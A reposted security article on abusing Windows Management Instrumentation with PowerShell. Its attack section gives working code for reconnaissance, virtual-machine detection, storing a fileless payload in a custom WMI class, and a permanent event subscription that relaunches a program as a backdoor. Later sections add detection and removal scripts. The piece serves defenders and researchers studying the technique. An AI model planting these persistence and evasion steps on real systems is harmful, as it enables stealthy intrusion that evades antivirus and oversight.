WMI Attacks

Posted by wyzsk on 2020-08-19
Author: 三好學生 · 2015/08/24 10:19

0x00 Preface



Matt Graeber showed at Black Hat how WMI can be used and demonstrated the resulting attacks, but he held back some of the details, so this post walks through how to implement WMI attacks with PowerShell.

0x01 Notes


The most common use of WMI in internal network penetration is wmiexec, which was already covered in /tips/?id=7358, so remote WMI is not the focus here.

Reference links: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor.pdf

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

0x02 Test environment


Operating system: Win8 x32, PowerShell v3 (installed by default on Win8), Winmgmt service enabled so that WMI is available.

0x03 WMI attacks


Note: all of the code below is PowerShell.

1. Reconnaissance

Operating system information

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS

File/directory listing

Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile

Disk volume listing

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume

Registry operations

# StdRegProv has no instances; -List returns the class object whose methods (GetStringValue, EnumKey, ...) read the registry
Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv -List
# The two lines below use PowerShell's registry provider rather than WMI
Push-Location HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty OptionalComponents

[Figure: screenshot of the output in the original post]

Current processes

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process

Enumerating services

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service

Event logs

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent

Logged-on accounts

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser

Shares

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share

Patches

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering

Antivirus software

Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

2. Virtual machine detection

(1) Check TotalPhysicalMemory and NumberOfLogicalProcessors

$VMDetected = $False
# Fewer than 2 logical processors and less than 2 GB of RAM is treated as a VM indicator
$Arguments = @{
    Class  = 'Win32_ComputerSystem'
    Filter = 'NumberOfLogicalProcessors < 2 AND TotalPhysicalMemory < 2147483648'
}
if (Get-WmiObject @Arguments) {
    $VMDetected = $True
    "In vm"
}
else {
    "Not in vm"
}

(2) Check for virtual machine processes

$VMwareDetected = $False
# Network adapter, BIOS serial number and the VMware Tools process are checked
$VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE "%VMware%" OR Name LIKE "%VMware%"'
$VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"'
$VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"'
if ($VMAdapter -or $VMBios -or $VMToolsRunning) {
    $VMwareDetected = $True
    "in vm"
}
else {
    "not in vm"
}

3. Storing a payload

[Administrator privileges required]

# Create a new static class in root\cimv2 and store the payload as a property default value
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null, $null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
$StaticClass.Properties.Add('EvilProperty', "This is payload")
$StaticClass.Put()

[Figure: screenshot of the stored class in the original post]

Tips:

The payload can be stored here in encrypted form and decrypted at run time, so that no file is written to disk.
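From the defender's side, a class created this way is a static class in the repository with no WMI provider behind it. The following is an added example (not from the original post) that lists such classes in a namespace and previews any property default values they carry; it is a heuristic, since some legitimate static classes will also appear, and the remover function is meant to be run only on a class confirmed as malicious. The function names Find-StaticWmiClass and Remove-WmiClass are my own.

```powershell
# Added example: hunt for static (provider-less) classes that could hold a stored payload.
# Heuristic: provider-backed system classes carry the 'dynamic' and 'provider' qualifiers
# and base classes carry 'abstract'; a class created with ManagementClass.Put() has none.
function Find-StaticWmiClass {
    param([string]$Namespace = 'root\cimv2')
    Get-WmiObject -Namespace $Namespace -List | Where-Object {
        $qualifiers = @($_.Qualifiers | ForEach-Object { $_.Name })
        $_.Name -notlike '__*' -and
        $qualifiers -notcontains 'dynamic' -and
        $qualifiers -notcontains 'provider' -and
        $qualifiers -notcontains 'abstract'
    } | ForEach-Object {
        $class = $_
        # A payload lives in a property default value, so only non-empty values are reported
        $class.Properties | Where-Object { $_.Value -and $_.Name -notlike '__*' } | ForEach-Object {
            $text = [string]$_.Value
            [pscustomobject]@{
                Class    = $class.Name
                Property = $_.Name
                Type     = $_.Type
                Length   = $text.Length
                Preview  = $text.Substring(0, [Math]::Min(80, $text.Length))
            }
        }
    }
}

# Delete a class once it has been confirmed as malicious (administrator privileges required)
function Remove-WmiClass {
    param([string]$Namespace, [string]$ClassName)
    $class = [wmiclass]"${Namespace}:$ClassName"
    $class.Delete()
}

Find-StaticWmiClass | Format-Table -AutoSize
# Example clean-up of the class created above: Remove-WmiClass -Namespace 'root\cimv2' -ClassName 'Win32_EvilClass'
```

Long or high-entropy values in the Preview column are the ones worth a closer look, since an encrypted payload stored as described in the tip above would show up exactly that way.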

4. Covert scheduled program launch

[Administrator privileges required]

$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\notepad.exe'
# Polls every 60 seconds for a modification of the Win32_PerfFormattedData_PerfOS_System instance
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
# Event filter
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
# Event consumer: the program to launch
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
# Binding that links the filter to the consumer
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}

[Figure: screenshot of the created subscription in the original post]

notepad.exe is executed once every 60 seconds.

Tips:

Stuxnet already used this backdoor, implemented through MOF.
The technique is still in use by many people today...
Antivirus software does not flag this behaviour either...

0x04 WMI backdoor detection and removal

1. Viewing the current WMI event subscriptions

[Administrator privileges required]

#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter

#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
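The three queries above list filters, consumers and bindings separately, so the reader still has to match them up by hand. The following added example (not from the original post) resolves every binding to its filter query and consumer action and flags the consumer classes that execute code. The helper names Get-RelPath and Get-WmiSubscriptionReport are my own, and the handling of both relative and full object references in bindings is an assumption about how the reference is stored.

```powershell
# Added example: one row per permanent WMI event subscription, with the code-executing
# consumer classes (CommandLineEventConsumer, ActiveScriptEventConsumer) flagged.
$ns = 'root\subscription'

function Get-RelPath([string]$Reference) {
    # Bindings store references as a relative path ('__EventFilter.Name="BotFilter82"') or a
    # full path ('\\HOST\root\subscription:__EventFilter.Name="BotFilter82"'); normalise to relative.
    if ($Reference -match '^\\\\[^:]*:(.+)$') { return $Matches[1] }
    return $Reference
}

function Get-WmiSubscriptionReport {
    $filters   = @{}
    $consumers = @{}
    Get-WmiObject -Namespace $ns -Class __EventFilter   | ForEach-Object { $filters[$_.__RELPATH]   = $_ }
    Get-WmiObject -Namespace $ns -Class __EventConsumer | ForEach-Object { $consumers[$_.__RELPATH] = $_ }

    foreach ($binding in Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding) {
        $filter   = $filters[(Get-RelPath $binding.Filter)]
        $consumer = $consumers[(Get-RelPath $binding.Consumer)]
        # The action lives in a different property depending on the consumer class
        $action = if (-not $consumer)                  { '(consumer missing: dangling binding)' }
                  elseif ($consumer.CommandLineTemplate) { $consumer.CommandLineTemplate }
                  elseif ($consumer.ExecutablePath)      { $consumer.ExecutablePath }
                  elseif ($consumer.ScriptText)          { $consumer.ScriptText }
                  elseif ($consumer.ScriptFileName)      { $consumer.ScriptFileName }
                  else                                   { '(no command; log, SMTP or similar consumer)' }
        [pscustomobject]@{
            Filter        = $filter.Name
            Query         = $filter.Query
            ConsumerClass = $consumer.__CLASS
            Consumer      = $consumer.Name
            Action        = $action
            Suspicious    = $consumer.__CLASS -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer'
        }
    }
}

Get-WmiSubscriptionReport | Format-List
```

A default Windows installation ships with a benign binding of this kind (the SCM Event Log Filter bound to an NTEventLogEventConsumer), which the report shows with Suspicious set to False; the subscription created in section 0x03 appears with Suspicious set to True and notepad.exe in the Action column.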

[Figure: screenshot of the listed filters, consumers and bindings in the original post]

2. Removing the backdoor

[Administrator privileges required]

#Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose

#Consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose

#Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

[Figure: screenshot of the removal output in the original post]

0x05 Summary

PowerShell is not the only way to implement WMI attacks; alternatives include:

– VBS
– MOF
– C/C++ via IWbem* COM API
– .NET System.Management classes

There are also many detection methods, for example reviewing the logs:

– Microsoft-Windows-WinRM/Operational
– Microsoft-Windows-WMI-Activity/Operational
– Microsoft-Windows-DistributedCOM

Disabling the Winmgmt service altogether blocks the technique at its root.
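Of the logs listed above, Microsoft-Windows-WMI-Activity/Operational is the one that records subscription activity directly. The following added example (not from the original post) pulls those entries and extracts the namespace, consumer, command line and query from the message text. It assumes Windows 10 / Server 2016 or later, where the log carries event IDs 5859 (permanent event filter activated), 5860 (temporary subscription) and 5861 (permanent consumer bound, including the consumer's command line); the Win8 test box used in this post may not produce them. The function name Get-WmiSubscriptionEvents and the regular expressions over the message body are my own assumptions about the message layout.

```powershell
# Added example: surface WMI subscription activity from the WMI-Activity operational log.
# Assumption: Windows 10 / Server 2016 or later and the channel enabled; otherwise no rows.
function Get-WmiSubscriptionEvents {
    param([int]$MaxEvents = 200)
    $filter = @{
        LogName = 'Microsoft-Windows-WMI-Activity/Operational'
        Id      = 5859, 5860, 5861
    }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue | ForEach-Object {
        $msg = $_.Message
        [pscustomobject]@{
            Time        = $_.TimeCreated
            Id          = $_.Id
            # The message embeds the filter/consumer instances in MOF-like text; these regexes are a heuristic
            Namespace   = if ($msg -match 'Namespace\s*=\s*([^;]+)')                 { $Matches[1].Trim() } else { $null }
            Consumer    = if ($msg -match 'Consumer\s*=\s*([^;]+)')                  { $Matches[1].Trim() } else { $null }
            CommandLine = if ($msg -match 'CommandLineTemplate\s*=\s*"([^"]*)"')     { $Matches[1] }        else { $null }
            Query       = if ($msg -match 'Query\s*=\s*"([^"]*)"')                   { $Matches[1] }        else { $null }
        }
    }
}

Get-WmiSubscriptionEvents | Format-Table -AutoSize
```

Because a backdoor like the one in section 0x03 is created once and then survives reboots, the 5861 record of its creation may be days or weeks older than the activity it causes; retaining or forwarding this channel matters more than its size suggests.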


Discussion of further WMI attack methods is welcome.

This article was written by 三好學生 and first published on WooYun drops; please credit the source when reposting.

This article comes from the WooYun knowledge base; this mirror exists for study and research, and the copyright belongs to the WooYun knowledge base.
